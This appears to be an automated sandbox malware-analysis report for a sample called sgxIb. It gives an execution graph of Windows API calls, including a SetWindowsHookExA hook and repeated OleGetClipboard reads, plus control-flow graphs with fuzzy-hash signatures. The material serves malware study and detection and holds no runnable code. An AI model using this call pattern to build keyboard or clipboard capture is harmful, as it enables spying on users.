                                                                                                                    execution_graph 31103 682d373 31104 682d327 SetWindowsHookExA 31103->31104 31106 682d377 31103->31106 31105 682d33a 31104->31105 30867 f3d030 30868 f3d048 30867->30868 30869 f3d0a2 30868->30869 30876 6825e42 30868->30876 30882 682384c 30868->30882 30890 682383c 30868->30890 30894 682a799 30868->30894 30902 6825f70 30868->30902 30906 6825e50 30868->30906 30877 6825e76 30876->30877 30878 682383c 3 API calls 30877->30878 30879 6825e82 30878->30879 30880 682384c 2 API calls 30879->30880 30881 6825e97 30880->30881 30881->30869 30885 6823857 30882->30885 30883 682a801 30887 682a7ff 30883->30887 30926 682974c 30883->30926 30885->30883 30886 682a7f1 30885->30886 30912 682a928 30886->30912 30919 682a91f 30886->30919 30891 6823847 30890->30891 31011 6823874 30891->31011 30893 6825f87 30893->30869 30895 682a7a0 30894->30895 30896 682a801 30895->30896 30898 682a7f1 30895->30898 30897 682974c 2 API calls 30896->30897 30899 682a7ff 30896->30899 30897->30899 30900 682a928 2 API calls 30898->30900 30901 682a91f 2 API calls 30898->30901 30900->30899 30901->30899 30903 6825f80 30902->30903 30904 6823874 3 API calls 30903->30904 30905 6825f87 30904->30905 30905->30869 30907 6825e76 30906->30907 30908 682383c 3 API calls 30907->30908 30909 6825e82 30908->30909 30910 682384c 2 API calls 30909->30910 30911 6825e97 30910->30911 30911->30869 30914 682a92e 30912->30914 30913 682974c 2 API calls 30913->30914 30914->30913 30915 682aa0e 30914->30915 30933 682adf3 30914->30933 30938 682adfb 30914->30938 30943 682ae00 30914->30943 30915->30887 30921 682a928 30919->30921 30920 682974c 2 API calls 30920->30921 30921->30920 30922 682aa0e 30921->30922 30923 682adf3 OleGetClipboard 30921->30923 30924 682ae00 OleGetClipboard 30921->30924 30925 682adfb OleGetClipboard 30921->30925 30922->30887 30923->30921 30924->30921 30925->30921 30927 6829757 30926->30927 30928 682ab14 30927->30928 30929 682aa6a 30927->30929 30931 682384c OleGetClipboard 30928->30931 30930 682aac2 CallWindowProcW 30929->30930 30932 682aa71 30929->30932 30930->30932 30931->30932 30932->30887 30934 682adf6 30933->30934 30935 682ade6 30934->30935 30948 682b3b1 30934->30948 30955 682b3b8 30934->30955 30935->30914 30939 682ae1f 30938->30939 30940 682ae76 30939->30940 30941 682b3b1 OleGetClipboard 30939->30941 30942 682b3b8 OleGetClipboard 30939->30942 30940->30914 30941->30939 30942->30939 30944 682ae1f 30943->30944 30945 682ae76 30944->30945 30946 682b3b1 OleGetClipboard 30944->30946 30947 682b3b8 OleGetClipboard 30944->30947 30945->30914 30946->30944 30947->30944 30949 682b3b8 30948->30949 30950 682b3d4 30949->30950 30962 682b400 30949->30962 30974 682b3fe 30949->30974 30986 682b3f1 30949->30986 30950->30934 30951 682b3e9 30951->30934 30956 682b3c0 30955->30956 30957 682b3d4 30956->30957 30959 682b400 OleGetClipboard 30956->30959 30960 682b3f1 OleGetClipboard 30956->30960 30961 682b3fe OleGetClipboard 30956->30961 30957->30934 30958 682b3e9 30958->30934 30959->30958 30960->30958 30961->30958 30963 682b412 30962->30963 30964 682b471 30963->30964 30965 682b42d 30963->30965 30968 682b4f1 30964->30968 30998 682b6c1 30964->30998 31003 682b6c8 30964->31003 30969 682b400 OleGetClipboard 30965->30969 30970 682b3f1 OleGetClipboard 30965->30970 30971 682b3fe OleGetClipboard 30965->30971 30966 682b433 30966->30951 30967 682b50f 30967->30951 30968->30951 30969->30966 30970->30966 30971->30966 30975 682b400 30974->30975 30976 682b471 30975->30976 30977 682b42d 30975->30977 30980 682b4f1 30976->30980 30984 682b6c1 OleGetClipboard 30976->30984 30985 682b6c8 OleGetClipboard 30976->30985 30981 682b400 OleGetClipboard 30977->30981 30982 682b3f1 OleGetClipboard 30977->30982 30983 682b3fe OleGetClipboard 30977->30983 30978 682b433 30978->30951 30979 682b50f 30979->30951 30980->30951 30981->30978 30982->30978 30983->30978 30984->30979 30985->30979 30987 682b3fa 30986->30987 30988 682b42d 30987->30988 30990 682b471 30987->30990 30993 682b400 OleGetClipboard 30988->30993 30994 682b3f1 OleGetClipboard 30988->30994 30995 682b3fe OleGetClipboard 30988->30995 30989 682b433 30989->30951 30992 682b4f1 30990->30992 30996 682b6c1 OleGetClipboard 30990->30996 30997 682b6c8 OleGetClipboard 30990->30997 30991 682b50f 30991->30951 30992->30951 30993->30989 30994->30989 30995->30989 30996->30991 30997->30991 30999 682b6a6 30998->30999 31001 682b6c6 30998->31001 30999->30967 31002 682b703 31001->31002 31007 682b160 31001->31007 31002->30967 31005 682b6dd 31003->31005 31004 682b160 OleGetClipboard 31004->31005 31005->31004 31006 682b703 31005->31006 31006->30967 31008 682b770 OleGetClipboard 31007->31008 31010 682b80a 31008->31010 31012 682387f 31011->31012 31017 6823704 31012->31017 31014 6825fe9 31016 6826057 31014->31016 31022 6823714 31014->31022 31018 682370f 31017->31018 31019 68246b3 31018->31019 31026 682499e 31018->31026 31037 682490f 31018->31037 31019->31014 31023 6824bf0 GetModuleHandleW 31022->31023 31025 6824c65 31023->31025 31025->31016 31027 68249ee 31026->31027 31028 6823714 GetModuleHandleW 31027->31028 31029 6824a3a 31028->31029 31030 6823714 GetModuleHandleW 31029->31030 31033 6824b0f 31029->31033 31036 6824ab4 31029->31036 31031 6824a88 31030->31031 31032 6823714 GetModuleHandleW 31031->31032 31031->31036 31032->31036 31033->31019 31034 6824c38 GetModuleHandleW 31035 6824c65 31034->31035 31035->31019 31036->31033 31036->31034 31038 682491a 31037->31038 31039 6823714 GetModuleHandleW 31038->31039 31040 6824a3a 31039->31040 31041 6823714 GetModuleHandleW 31040->31041 31044 6824ab4 31040->31044 31045 6824b0f 31040->31045 31042 6824a88 31041->31042 31043 6823714 GetModuleHandleW 31042->31043 31042->31044 31043->31044 31044->31045 31046 6824c38 GetModuleHandleW 31044->31046 31045->31019 31047 6824c65 31046->31047 31047->31019 31048 6823008 31049 682301a 31048->31049 31052 68230cb 31049->31052 31054 6822d04 31049->31054 31051 6823091 31059 6822d24 31051->31059 31055 6822d0f 31054->31055 31063 68241b3 31055->31063 31072 68241c8 31055->31072 31056 682326a 31056->31051 31060 6822d2f 31059->31060 31062 682ad4b 31060->31062 31086 68297a4 31060->31086 31062->31052 31064 68241c8 31063->31064 31065 6823704 3 API calls 31064->31065 31066 682425a 31065->31066 31070 6823704 3 API calls 31066->31070 31081 6824699 31066->31081 31067 6824276 31068 6823714 GetModuleHandleW 31067->31068 31069 68242a2 31067->31069 31068->31069 31070->31067 31073 68241ce 31072->31073 31074 6823704 3 API calls 31073->31074 31075 682425a 31074->31075 31079 6823704 3 API calls 31075->31079 31080 6824699 3 API calls 31075->31080 31076 6824276 31077 6823714 GetModuleHandleW 31076->31077 31078 68242a2 31076->31078 31077->31078 31079->31076 31080->31076 31083 68246a8 31081->31083 31082 68246b3 31082->31067 31083->31082 31084 682499e 2 API calls 31083->31084 31085 682490f 2 API calls 31083->31085 31084->31082 31085->31082 31087 682ad60 KiUserCallbackDispatcher 31086->31087 31089 682adce 31087->31089 31089->31060 31090 6829b98 DuplicateHandle 31091 6829c2e 31090->31091 31092 6825c98 31093 6825d00 CreateWindowExW 31092->31093 31095 6825dbc 31093->31095 31096 682b5d8 31097 682b5e3 31096->31097 31099 682b5f3 31097->31099 31100 682b048 31097->31100 31101 682b628 OleInitialize 31100->31101 31102 682b68c 31101->31102 31102->31099

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 731 6837e98-6837eb6 734 6837eb8-6837ebb 731->734 735 6837ebd-6837ed7 734->735 736 6837edc-6837edf 734->736 735->736 737 6837ee1-6837eef 736->737 738 6837ef6-6837ef9 736->738 745 6837ef1 737->745 746 6837f3e-6837f54 737->746 739 6837efb-6837f17 738->739 740 6837f1c-6837f1f 738->740 739->740 743 6837f21-6837f2b 740->743 744 6837f2c-6837f2e 740->744 747 6837f30 744->747 748 6837f35-6837f38 744->748 745->738 753 6837f5a-6837f63 746->753 754 683816f-6838179 746->754 747->748 748->734 748->746 755 683817a-6838182 753->755 756 6837f69-6837f86 753->756 759 6838184-6838188 755->759 760 683818a 755->760 766 683815c-6838169 756->766 767 6837f8c-6837fb4 756->767 759->760 761 6838192-6838195 760->761 762 683818c-683818e 760->762 765 6838196-68381af 761->765 764 6838190-6838191 762->764 762->765 764->761 768 68381b1-68381b4 765->768 766->753 766->754 767->766 778 6837fba-6837fc3 767->778 770 68381ba-68381c9 768->770 771 68383e9-68383ec 768->771 781 68381cb-68381e6 770->781 782 68381e8-683822c 770->782 772 683840f-6838412 771->772 773 68383ee-683840a 771->773 776 6838418-6838424 772->776 777 68384bd-68384bf 772->777 773->772 784 683842f-6838431 776->784 779 68384c1 777->779 780 68384c6-68384c9 777->780 778->755 785 6837fc9-6837fe5 778->785 779->780 780->768 786 68384cf-68384d8 780->786 781->782 792 6838232-6838243 782->792 793 68383bd-68383d3 782->793 788 6838433-6838439 784->788 789 6838449-683844d 784->789 801 6837feb-6838015 785->801 802 683814a-6838156 785->802 794 683843b 788->794 795 683843d-683843f 788->795 796 683845b 789->796 797 683844f-6838459 789->797 807 6838249-6838266 792->807 808 68383a8-68383b7 792->808 793->771 794->789 795->789 799 6838460-6838462 796->799 797->799 805 6838473-68384ac 799->805 806 6838464-6838467 799->806 819 6838140-6838145 801->819 820 683801b-6838043 801->820 802->766 802->778 805->770 826 68384b2-68384bc 805->826 806->786 807->808 818 683826c-6838362 call 68366b8 807->818 808->792 808->793 872 6838370 818->872 873 6838364-683836e 818->873 819->802 820->819 829 6838049-6838077 820->829 829->819 835 683807d-6838086 829->835 835->819 836 683808c-68380be 835->836 843 68380c0-68380c4 836->843 844 68380c9-68380e5 836->844 843->819 846 68380c6 843->846 844->802 847 68380e7-683813e call 68366b8 844->847 846->844 847->802 874 6838375-6838377 872->874 873->874 874->808 875 6838379-683837e 874->875 876 6838380-683838a 875->876 877 683838c 875->877 878 6838391-6838393 876->878 877->878 878->808 879 6838395-68383a1 878->879 879->808
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: ce955ed64faec026bbb99ec3b72da38d5eed2acf24f216ceddb42f4037766b8b
                                                                                                                    • Instruction ID: 055e727962c6d15e82b44dce36890584b5bebc2933cf77c552b4f76de3093c6a
                                                                                                                    • Opcode Fuzzy Hash: ce955ed64faec026bbb99ec3b72da38d5eed2acf24f216ceddb42f4037766b8b
                                                                                                                    • Instruction Fuzzy Hash: B1029C70B002259FDB54DB68D9906AEB7E2FF84304F148929E509DB794DB35EC82CBD1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7fe52c881670f39e9913f15d822545b2cf63045982d491e51b4658b627d00d27
                                                                                                                    • Instruction ID: d2000c3143f5c84b49d22a271ced2887a3b7f933326ca900e02d6f5078bf2d7d
                                                                                                                    • Opcode Fuzzy Hash: 7fe52c881670f39e9913f15d822545b2cf63045982d491e51b4658b627d00d27
                                                                                                                    • Instruction Fuzzy Hash: D023F931D10B198ACB15EF68C8945ADF7B1FF99300F15D79AE458B7221EB70AAC4CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 0-3993045852
                                                                                                                    • Opcode ID: 4fb9973e3c477970a4ad22b3cd1647590f074a3394023f6e7ed073fb6d72ccdb
                                                                                                                    • Instruction ID: 840659cceea88702eed5b5b9066f4c765ee81d9eb5d61402cc7869cd03eb9d45
                                                                                                                    • Opcode Fuzzy Hash: 4fb9973e3c477970a4ad22b3cd1647590f074a3394023f6e7ed073fb6d72ccdb
                                                                                                                    • Instruction Fuzzy Hash: C122D371E002258FDF64DFA4D4846AEBBB2EF84324F208469D949EB354DA35DD41CBD2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52a2ebadcfe1737e1d339bda6cdb91583c1dc51372678d4350e5e04824f82f5f
                                                                                                                    • Instruction ID: 674dd93fec44bbb3cabb75cc8442f71d1dd83cf36fda0aa68e1f74f1063b499f
                                                                                                                    • Opcode Fuzzy Hash: 52a2ebadcfe1737e1d339bda6cdb91583c1dc51372678d4350e5e04824f82f5f
                                                                                                                    • Instruction Fuzzy Hash: B662CE30B002249FDB54DB68D594AADB7F2FF85314F248469E909EB350EB35ED82CB90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 256 6839268-683928d 258 683928f-6839292 256->258 259 6839294-68392b3 258->259 260 68392b8-68392bb 258->260 259->260 261 68392c1-68392d6 260->261 262 6839b7b-6839b7d 260->262 269 68392d8-68392de 261->269 270 68392ee-6839304 261->270 264 6839b84-6839b87 262->264 265 6839b7f 262->265 264->258 267 6839b8d-6839b97 264->267 265->264 271 68392e2-68392e4 269->271 272 68392e0 269->272 274 683930f-6839311 270->274 271->270 272->270 275 6839313-6839319 274->275 276 6839329-683939a 274->276 277 683931b 275->277 278 683931d-683931f 275->278 287 68393c6-68393e2 276->287 288 683939c-68393bf 276->288 277->276 278->276 293 68393e4-6839407 287->293 294 683940e-6839429 287->294 288->287 293->294 299 6839454-683946f 294->299 300 683942b-683944d 294->300 305 6839471-6839493 299->305 306 683949a-68394a4 299->306 300->299 305->306 307 68394a6-68394af 306->307 308 68394b4-683952e 306->308 307->267 314 6839530-683954e 308->314 315 683957b-6839590 308->315 319 6839550-683955f 314->319 320 683956a-6839579 314->320 315->262 319->320 320->314 320->315
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 7fec489ee3592e8082de40e5141a3f6e8d2beb37b1012e4961edadd949b02702
                                                                                                                    • Instruction ID: 772acf9a2984f26df731ecb769cc098443c28e3113a13f8129cf69d58aac2c03
                                                                                                                    • Opcode Fuzzy Hash: 7fec489ee3592e8082de40e5141a3f6e8d2beb37b1012e4961edadd949b02702
                                                                                                                    • Instruction Fuzzy Hash: 03915170B0022A9FDF54EB65D9507AEB7F6AFC9208F108969C40DEB744EA709C42CB95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 666 6834c80-6834ca4 668 6834ca6-6834ca9 666->668 669 6834cab-6834cc5 668->669 670 6834cca-6834ccd 668->670 669->670 671 6834cd3-6834dcb 670->671 672 68353ac-68353ae 670->672 690 6834dd1-6834e1e call 683552b 671->690 691 6834e4e-6834e55 671->691 673 68353b0 672->673 674 68353b5-68353b8 672->674 673->674 674->668 676 68353be-68353cb 674->676 704 6834e24-6834e40 690->704 692 6834e5b-6834ecb 691->692 693 6834ed9-6834ee2 691->693 710 6834ed6 692->710 711 6834ecd 692->711 693->676 707 6834e42 704->707 708 6834e4b 704->708 707->708 708->691 710->693 711->710
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq$\Ocq
                                                                                                                    • API String ID: 0-3575482020
                                                                                                                    • Opcode ID: e26d939fa3c37a7c604fc7856e2a45cc8d585e2725ea9a0c75bc5b1a9dcb1d91
                                                                                                                    • Instruction ID: 665800abc07bcffd43cf57fc900bae1cbd175c5f23d1365fa129f86f802773c6
                                                                                                                    • Opcode Fuzzy Hash: e26d939fa3c37a7c604fc7856e2a45cc8d585e2725ea9a0c75bc5b1a9dcb1d91
                                                                                                                    • Instruction Fuzzy Hash: 3A618170F002189FEB54DFA9C8547AEBBF2EF88710F20842AE505EB391DB758D058B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 943 683925b-683925d 944 6839260-6839262 943->944 945 6839266-6839269 943->945 946 6839264-6839265 944->946 947 683926a-683928d 944->947 945->947 946->945 949 683928f-6839292 947->949 950 6839294-68392b3 949->950 951 68392b8-68392bb 949->951 950->951 952 68392c1-68392c9 951->952 953 6839b7b-6839b7d 951->953 957 68392d4-68392d6 952->957 955 6839b84-6839b87 953->955 956 6839b7f 953->956 955->949 958 6839b8d-6839b97 955->958 956->955 960 68392d8-68392de 957->960 961 68392ee-68392f1 957->961 962 68392e2-68392e4 960->962 963 68392e0 960->963 964 68392f9-6839304 961->964 962->961 963->961 965 683930f-6839311 964->965 966 6839313-6839319 965->966 967 6839329-683939a 965->967 968 683931b 966->968 969 683931d-683931f 966->969 978 68393c6-68393e2 967->978 979 683939c-68393bf 967->979 968->967 969->967 984 68393e4-6839407 978->984 985 683940e-6839429 978->985 979->978 984->985 990 6839454-683946f 985->990 991 683942b-683944d 985->991 996 6839471-6839493 990->996 997 683949a-68394a4 990->997 991->990 996->997 998 68394a6-68394af 997->998 999 68394b4-683952e 997->999 998->958 1005 6839530-683954e 999->1005 1006 683957b-6839590 999->1006 1010 6839550-683955f 1005->1010 1011 683956a-6839579 1005->1011 1006->953 1010->1011 1011->1005 1011->1006
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 799a6ef70043a946ab608f8408e7493377715834240bfa570a9a56078985c5c1
                                                                                                                    • Instruction ID: 3d8fb3a9dd063bf939709dd9676c45ee81ef4f069f0297c55433246744bd8f5e
                                                                                                                    • Opcode Fuzzy Hash: 799a6ef70043a946ab608f8408e7493377715834240bfa570a9a56078985c5c1
                                                                                                                    • Instruction Fuzzy Hash: 3D517470B001159FDF54EB78D990B6EB7F6EBC9208F108529D419DB788EA70DC42CBA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: 82f1ed6521951bab56b337253824aa0ecaff9863012af64094a144e2847f0632
                                                                                                                    • Instruction ID: 6d37055a3fc7e7403036273af4888cf708e7ccb7a765809affd78d33cdf3d830
                                                                                                                    • Opcode Fuzzy Hash: 82f1ed6521951bab56b337253824aa0ecaff9863012af64094a144e2847f0632
                                                                                                                    • Instruction Fuzzy Hash: F941C070E10329DFDB61DFA9C8547AEBBB2BF96304F104929D905EB340DB749946CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q
                                                                                                                    • API String ID: 0-388095546
                                                                                                                    • Opcode ID: 2b326be6645408022546cf9682927dfaa2e59cc95cb7c074af10fb443ae49fa8
                                                                                                                    • Instruction ID: b7fe80f30af9c6669b827ad5f054dcbb80387a3d8615df173000162aadba0e64
                                                                                                                    • Opcode Fuzzy Hash: 2b326be6645408022546cf9682927dfaa2e59cc95cb7c074af10fb443ae49fa8
                                                                                                                    • Instruction Fuzzy Hash: 8EF0F4B1B002349FDFB49B44F94126CB769EB40208F044866FA04CB954C735D901C7D0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \Ocq
                                                                                                                    • API String ID: 0-2995510325
                                                                                                                    • Opcode ID: 53226a921d3d8a96edb236ad2d8ef6e4a590ec9ec7bbdb5d12ee1a073e932fef
                                                                                                                    • Instruction ID: e34859780c140cab1f8cf54a1ffa51a69d1fc0415bb925129aa2fa59827fb4f2
                                                                                                                    • Opcode Fuzzy Hash: 53226a921d3d8a96edb236ad2d8ef6e4a590ec9ec7bbdb5d12ee1a073e932fef
                                                                                                                    • Instruction Fuzzy Hash: B6F0D430A10129DBDB14DF94E959BAEBBB2FF88704F204519E502EB294CBB41D05CBC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3da528b5e979ac58d73a88e4265d53bb318919577a96b9b4a45066d7369c01fc
                                                                                                                    • Instruction ID: dbeacc967b431647824a9f2dd2c9b50dcefd771ac710e417bd8e90f3eea07a57
                                                                                                                    • Opcode Fuzzy Hash: 3da528b5e979ac58d73a88e4265d53bb318919577a96b9b4a45066d7369c01fc
                                                                                                                    • Instruction Fuzzy Hash: 7332B470B102298FDB64DB68D980BAEB7B2FF88314F108525E509EB755DB35EC42CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f7a5f51783d46ee24cf1efbb1714f121e29913cb0775a78ea17ee6f0bad8d72
                                                                                                                    • Instruction ID: 281922d9a1d238e19160a31601d736f7bc7a24ebeefbd20f43c91303c9d7390a
                                                                                                                    • Opcode Fuzzy Hash: 5f7a5f51783d46ee24cf1efbb1714f121e29913cb0775a78ea17ee6f0bad8d72
                                                                                                                    • Instruction Fuzzy Hash: 6F226FB0E102298FDF64DB68D5907ADB7F2EB55310F248826E509EB395DB34DC81CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2200399768a856398a22530c97c742ef3bab8fd0ecc903910066e82e114a6d5e
                                                                                                                    • Instruction ID: 90462da958925f456330e32acfbc9a7247c5f18e40dd607e4309a058b73de650
                                                                                                                    • Opcode Fuzzy Hash: 2200399768a856398a22530c97c742ef3bab8fd0ecc903910066e82e114a6d5e
                                                                                                                    • Instruction Fuzzy Hash: 71610471F001214FCF119A7DC88466FBAD7AFC4224B25443AE80EDB364EE65DD4287C2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3e78814976b639b7f512c2ab9d32ba771013b161fe42948d8a5e2d38cb719ff7
                                                                                                                    • Instruction ID: 08a96a729b9fdc247a4f1ae832fd09a50ac44f777f91492082f19d3bfb1379ae
                                                                                                                    • Opcode Fuzzy Hash: 3e78814976b639b7f512c2ab9d32ba771013b161fe42948d8a5e2d38cb719ff7
                                                                                                                    • Instruction Fuzzy Hash: 1D815E70B002199FDF54DFA9D9546AEB7F2AF89304F108529D50ADB394EF34EC428B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b72bcd43d299599b7584ca079831015ff149d737ddf4c49e69c87d069b498aef
                                                                                                                    • Instruction ID: e6717e4194cefd945043682747d044b9c9d4697ff0144222cd8477778dbc9b2f
                                                                                                                    • Opcode Fuzzy Hash: b72bcd43d299599b7584ca079831015ff149d737ddf4c49e69c87d069b498aef
                                                                                                                    • Instruction Fuzzy Hash: 91914D34E102198BDF60DF68C890B9DB7B1FF89310F208599D549EB395EB70AA85CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d4c1c4559ac621adff3ca1b999dc0aaa2cf6937db1101c35333c507492469348
                                                                                                                    • Instruction ID: 539a3300bfc75768c542cae2c7b395fdcc2e2a7c6f4f0b7a3774f9d34eb26764
                                                                                                                    • Opcode Fuzzy Hash: d4c1c4559ac621adff3ca1b999dc0aaa2cf6937db1101c35333c507492469348
                                                                                                                    • Instruction Fuzzy Hash: 65913C74E102198BDF60DF68C880B9DB7B1FF89310F208599D549FB355EB70AA858F91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b1d125687282f831893a5cf4bbcbe50f43dc2a5e0559d049690fee3c94c39b02
                                                                                                                    • Instruction ID: d0de7146e6445070063b668a743086aaba688d94334d77192a9f8031457fcc03
                                                                                                                    • Opcode Fuzzy Hash: b1d125687282f831893a5cf4bbcbe50f43dc2a5e0559d049690fee3c94c39b02
                                                                                                                    • Instruction Fuzzy Hash: 4C716E70E012198FCB54DBA8D990AADBBF6FF88304F148529E109EB355DB34ED46CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.3023385107.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_6830000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
